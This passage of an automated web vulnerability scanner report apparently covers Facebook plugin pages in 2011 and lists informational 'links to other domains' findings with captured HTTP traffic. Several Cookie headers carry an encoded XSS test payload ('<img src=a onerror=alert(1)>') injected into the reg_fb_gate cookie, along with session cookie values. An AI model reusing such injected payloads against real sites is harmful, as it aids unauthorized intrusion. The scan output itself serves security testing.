http://profile.ak.fbcdn.net/hprofile-ak-snc4/27346_218301189_4069_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41763_100000233118312_2392_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

16.65. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187649_1808982609_3332083_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202988_736611069_7575841_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211391_713468228_4670594_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211540_1238885907_2541593_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211563_100002020447663_1302764_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

16.66. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161097_930382_8228585_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161755_1516233108_3624471_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173823_583081899_855451_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187666_7306067_1182998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202910_30100351_6302006_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203301_703272195_7499323_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203376_1020036532_4759583_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41621_223600395_8552_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41772_1086137078_8734_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

16.67. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/23301_286893159420_2873_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/engadget/id347839246?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D

Response

16.68. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://tctechcrunch.files.wordpress.com/2011/05/bill-gates-wired.jpg
http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-10-35-12-pm1.png
http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-2-29-35-am.png
http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-5-12-02-pm.png
http://tctechcrunch.files.wordpress.com/2011/05/viber-android.png
http://techcrunch.com/2011/05/02/twitter-to-buy-tweetdeck-for-40-million-50-million/
http://techcrunch.com/2011/05/03/ballmer-developers-rap/
http://techcrunch.com/2011/05/03/bill-gates-nuclear/
http://techcrunch.com/2011/05/03/google-dissolves-search-group-internally-now-called-knowledge/
http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/
http://techcrunch.com/2011/05/03/stipple/
http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/
http://www.crunchbase.com/assets/images/resized/0002/1352/21352v7-max-250x250.png
http://www.crunchbase.com/assets/images/resized/0002/9578/29578v31-max-250x250.png

Request

Response

16.69. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://tctechcrunch.files.wordpress.com/2010/08/facebook-logo.png
http://tctechcrunch.files.wordpress.com/2011/05/bill-gates-wired.jpg
http://tctechcrunch.files.wordpress.com/2011/05/flixster-picture.png
http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-10-35-12-pm1.png
http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-5-12-02-pm.png
http://tctechcrunch.files.wordpress.com/2011/05/viber-android.png
http://techcrunch.com/2011/05/03/ballmer-developers-rap/
http://techcrunch.com/2011/05/03/bill-gates-nuclear/
http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/
http://techcrunch.com/2011/05/04/facebook-one-third-online-ads/
http://techcrunch.com/2011/05/04/tc-cribs-likealittle-lal/
http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/
http://techcrunch.com/2011/05/04/warner-bros-acquires-social-movie-site-flixster-and-rotten-tomatoes/
http://techcrunch.com/home/wpcom/public_html/wp-content/themes/vip/tctechcrunchimages/logos_small/techcrunch2.png

Request

Response

16.70. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://tctechcrunch.files.wordpress.com/2011/05/bill-gates-wired.jpg
http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-10-35-12-pm1.png
http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-2-29-35-am.png
http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-5-12-02-pm.png
http://tctechcrunch.files.wordpress.com/2011/05/tt.png
http://techcrunch.com/2011/05/02/twitter-to-buy-tweetdeck-for-40-million-50-million/
http://techcrunch.com/2011/05/03/ballmer-developers-rap/
http://techcrunch.com/2011/05/03/bill-gates-nuclear/
http://techcrunch.com/2011/05/03/google-dissolves-search-group-internally-now-called-knowledge/
http://techcrunch.com/2011/05/03/new-imacs/
http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/
http://techcrunch.com/2011/05/03/stipple/
http://www.crunchbase.com/assets/images/resized/0002/1352/21352v7-max-250x250.png
http://www.crunchbase.com/assets/images/resized/0002/9578/29578v31-max-250x250.png

Request

Response

16.71. http://www.facebook.com/plugins/send.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/send.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/send.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df243eec6a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&ref=story-185322&sdk=joey

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/hhXWj5xHnMP.css

Request

GET /plugins/send.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df243eec6a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&ref=story-185322&sdk=joey HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.72. http://www.facebook.com/plugins/send.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/send.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/send.php?api_key=187288694643718&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfca7ad0b8%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=lucida+grande&href=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmashery-funding-2%2F&locale=en_US&sdk=joey

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/Ju8IBHuS1Zr.css

Request

GET /plugins/send.php?api_key=187288694643718&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfca7ad0b8%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=lucida+grande&href=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmashery-funding-2%2F&locale=en_US&sdk=joey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.140.49
Connection: close
Date: Thu, 05 May 2011 11:40:13 GMT
Content-Length: 7413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/Ju8IBHuS1Zr.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.73. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/r.php?locale=en_US

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/6iHeF4N1jZz.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/y_/r/LIzUXgNfPj0.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css

Request

Response

16.74. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/195657_100000824820783_404836_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/oaBzoE1JD-P.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/xKbCsbIPd0I.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png

Request

Response

16.75. http://www.facebook.com/share.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/share.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/share.php?u=

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/ip1sk_hStb2.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ZhCBW9gfata.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /share.php?u= HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.148.69
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 10425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/ip1sk_hStb2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ZhCBW9gfata.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...

16.76. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/sharer.php?u={{url}}&t={{title}}

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/ip1sk_hStb2.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ZhCBW9gfata.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /sharer.php?u={{url}}&t={{title}} HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu%3D%257B%257Burl%257D%257D%26t%3D%257B%257Btitle%257D%257D; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.148.73
Connection: close
Date: Thu, 05 May 2011 11:40:17 GMT
Content-Length: 10565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/ip1sk_hStb2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ZhCBW9gfata.css" />
